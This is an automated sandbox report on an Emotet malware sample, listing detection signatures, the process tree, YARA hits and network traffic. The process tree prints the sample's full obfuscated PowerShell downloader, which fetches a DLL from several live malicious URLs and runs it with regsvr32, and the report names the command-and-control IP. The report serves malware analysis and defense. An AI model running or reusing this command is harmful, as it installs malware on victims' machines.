Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report

Overview

General Information

Analysis ID:631940
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Query firmware table information (likely to detect VMs)
Changes security center settings (notifications, updates, antivirus, firewall)
Suspicious powershell command line found
Suspicious command line found
Powershell drops PE file
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • cmd.exe (PID: 6320 cmdline: cmd /C "powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"" MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 6364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6408 cmdline: powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • regsvr32.exe (PID: 6696 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP MD5: 426E7499F6A7346F0410DEAD0805586B)
        • regsvr32.exe (PID: 6680 cmdline: C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP MD5: D78B75FC68247E8A63ACBA846182740E)
          • regsvr32.exe (PID: 3572 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AHWppkeB\tZBUnLQvw.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
  • svchost.exe (PID: 6912 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6960 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7008 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7072 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7140 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 1128 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5992 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6032 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 1912 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6792 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5000 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6640 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6968 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5632 cmdline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000010.00000002.323155942.00000000028C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000011.00000002.505781692.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000011.00000002.505000054.0000000000C60000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          Process Memory Space: powershell.exe PID: 6408INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0xac2a:$b2: ::FromBase64String(
          • 0x1cedd:$b2: ::FromBase64String(
          • 0x5eeeb:$b2: ::FromBase64String(
          • 0x640d0:$b2: ::FromBase64String(
          • 0x6442b:$b2: ::FromBase64String(
          • 0x73a44:$b2: ::FromBase64String(
          • 0x73da4:$b2: ::FromBase64String(
          • 0x75f6b:$b2: ::FromBase64String(
          • 0x7c36e:$b2: ::FromBase64String(
          • 0x7c6cb:$b2: ::FromBase64String(
          • 0x7cc2e:$b2: ::FromBase64String(
          • 0x7d12b:$b2: ::FromBase64String(
          • 0x7df55:$b2: ::FromBase64String(
          • 0x7e2b2:$b2: ::FromBase64String(
          • 0x7eaf0:$b2: ::FromBase64String(
          • 0x7f1c7:$b2: ::FromBase64String(
          • 0x7fe4f:$b2: ::FromBase64String(
          • 0x80371:$b2: ::FromBase64String(
          • 0x88623:$b2: ::FromBase64String(
          • 0xae908:$b2: ::FromBase64String(
          • 0xaea11:$b2: ::FromBase64String(
          SourceRuleDescriptionAuthorStrings
          16.2.regsvr32.exe.28c0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            17.2.regsvr32.exe.c60000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              17.2.regsvr32.exe.c60000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                16.2.regsvr32.exe.28c0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  No Sigma rule has matched
                  No Snort rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: https://173.82.82.196:8080/temVAvira URL Cloud: Label: malware
                  Source: http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/Avira URL Cloud: Label: malware
                  Source: https://173.82.82.196:8080/lAvira URL Cloud: Label: malware
                  Source: http://digitalkitchen.jp/images/PVn/Avira URL Cloud: Label: malware
                  Source: https://173.82.82.196/URL Reputation: Label: malware
                  Source: http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/Avira URL Cloud: Label: malware
                  Source: https://173.82.82.196:8080/URL Reputation: Label: malware
                  Source: http://piffl.com/piffl.com/a/Avira URL Cloud: Label: malware
                  Source: https://nakharinitwebhosting.com/HSDYKN1X5GLF/Avira URL Cloud: Label: malware
                  Source: https://173.82.82.196:8080/PAvira URL Cloud: Label: malware
                  Source: jsonsintl.comVirustotal: Detection: 5%Perma Link
                  Source: http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/Virustotal: Detection: 14%Perma Link
                  Source: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCPReversingLabs: Detection: 40%
                  Source: C:\Windows\System32\AHWppkeB\tZBUnLQvw.dll (copy)ReversingLabs: Detection: 40%
                  Source: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCPJoe Sandbox ML: detected
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,17_2_00000001800248B0

                  Networking

                  barindex
                  Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 173.82.82.196 8080Jump to behavior
                  Source: Joe Sandbox ViewASN Name: MULTA-ASN1US MULTA-ASN1US
                  Source: Joe Sandbox ViewASN Name: DIMENOCUS DIMENOCUS
                  Source: Joe Sandbox ViewIP Address: 173.82.82.196 173.82.82.196
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 02:12:15 GMTServer: ApacheX-Powered-By: PHP/5.6.40Cache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 02:12:15 GMTContent-Disposition: attachment; filename="cfZG95JbCmghhw3pnr3FF4ZwGl.dll"Content-Transfer-Encoding: binarySet-Cookie: 628aed7f4404a=1653271935; expires=Mon, 23-May-2022 02:13:15 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 02:12:15 GMTContent-Length: 365056Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=40Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc d1 02 00 00 00 03 00 00 d2 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f2 06 00 00 00 e0 05 00 00 08 00 00 00 8a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhk
                  Source: global trafficHTTP traffic detected: GET /RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.jsonsintl.comConnection: Keep-Alive
                  Source: global trafficTCP traffic: 192.168.2.3:49752 -> 173.82.82.196:8080
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                  Source: svchost.exe, 00000016.00000003.386375309.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","P equals www.facebook.com (Facebook)
                  Source: svchost.exe, 00000016.00000003.386375309.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","P equals www.twitter.com (Twitter)
                  Source: svchost.exe, 00000016.00000003.386375309.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                  Source: svchost.exe, 00000016.00000003.386375309.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                  Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmentarz.5v.pl/themes/zalMkTb/
                  Source: regsvr32.exe, 00000011.00000003.390757486.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504419422.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.506488059.0000025912489000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.436767944.0000019AC6500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.505950785.0000021041500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: svchost.exe, 00000013.00000002.506283732.000002591240E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.436767944.0000019AC6500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: regsvr32.exe, 00000011.00000003.391691578.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504289621.0000000000B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: regsvr32.exe, 00000011.00000003.390757486.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000003.382340670.0000000002CFD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.505425880.0000000002CFD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504419422.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000003.382007388.0000000002C91000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000003.382164868.0000000002CD7000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.17.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://digitalkitchen.jp/images/PVn/
                  Source: svchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                  Source: powershell.exe, 00000002.00000002.320823240.00000000051EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsonsintl.com
                  Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/
                  Source: powershell.exe, 00000002.00000002.320233459.0000000004F75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://piffl.com/piffl.com/a/
